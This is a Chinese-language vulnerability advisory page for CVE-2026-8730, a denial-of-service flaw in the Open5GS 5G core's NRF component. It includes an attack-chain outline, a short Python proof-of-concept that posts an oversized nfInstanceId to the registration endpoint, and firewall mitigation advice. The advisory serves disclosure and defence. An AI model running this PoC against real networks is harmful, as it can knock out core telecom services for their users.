IPBUF安全漏洞报告
English
CVE-2026-8730 CVSS 4.3 中危

CVE-2026-8730 Open5GS拒绝服务漏洞

披露日期: 2026-05-17

漏洞信息

漏洞编号
CVE-2026-8730
漏洞类型
拒绝服务
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Open5GS

相关标签

拒绝服务Open5GS5G核心网NRFDoSCVE-2026-8730

漏洞概述

Open5GS是一款开源的5G核心网实现。在Open5GS 2.7.6及之前的版本中,NRF组件的`lib/sbi/context.c`文件内的`ogs_sbi_nf_instance_set_id`函数存在缺陷。攻击者可以通过操纵`nfInstanceId`参数,从远程发起攻击,导致目标服务拒绝服务。目前该漏洞利用代码已公开,厂商尚未回应修复请求。

技术细节

该漏洞位于Open5GS的NRF(网络存储库功能)组件中,具体影响`lib/sbi/context.c`源文件里的`ogs_sbi_nf_instance_set_id`函数。NRF在5G核心网架构中负责网络功能的注册与发现。漏洞产生的根本原因是系统在处理NF注册请求时,未对`nfInstanceId`参数进行充分的完整性验证或长度限制。攻击者可以利用这一弱点,构造包含特殊字符或超长字符串的`nfInstanceId`参数,并通过HTTP POST请求发送至NRF的注册接口。由于缺乏健壮的错误处理,这种恶意操纵可能导致缓冲区溢出、空指针解引用或内存耗尽,最终致使NRF进程崩溃或无响应。由于攻击向量为网络(AV:N)且无需用户交互(UI:N),这允许低权限攻击者远程瘫痪核心网的关键服务。

攻击链分析

STEP 1
侦察
攻击者扫描网络,识别出暴露的Open5GS NRF服务端点及API接口。
STEP 2
武器化
攻击者构造包含恶意`nfInstanceId`参数的JSON数据包,该参数旨在触发处理逻辑中的缺陷。
STEP 3
投递
攻击者通过HTTP POST请求将恶意数据包发送到NRF的NF实例注册接口。
STEP 4
利用
目标系统解析请求时,`ogs_sbi_nf_instance_set_id`函数处理恶意参数出错,导致服务崩溃或挂起,实现拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Proof of Concept for CVE-2026-8730 # Target: Open5GS NRF component # Description: Sends a malformed nfInstanceId to trigger DoS. target_url = "http://<target-ip>:<port>/nnrf-nfm/v1/nf-instances" malformed_id = "A" * 10000 # Payload with excessive length or special chars headers = { "Content-Type": "application/json", "Accept": "application/json" } # Malformed payload structure payload = { "nfInstanceId": malformed_id, "nfType": "AMF", "nfStatus": "REGISTERED" } try: response = requests.post(target_url, json=payload, headers=headers, timeout=5) print(f"Status Code: {response.status_code}") print("Payload sent. Check if the service crashes.") except Exception as e: print(f"Request failed or service down: {e}")

影响范围

Open5GS <= 2.7.6

防御指南

临时缓解措施
在官方补丁发布前,建议管理员通过防火墙规则严格限制对Open5GS NRF服务端口的访问来源,仅允许受信任的内部网络节点连接。同时,监控NRF组件的日志和进程状态,一旦检测到异常崩溃或大量畸形请求,立即进行人工干预重启服务。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表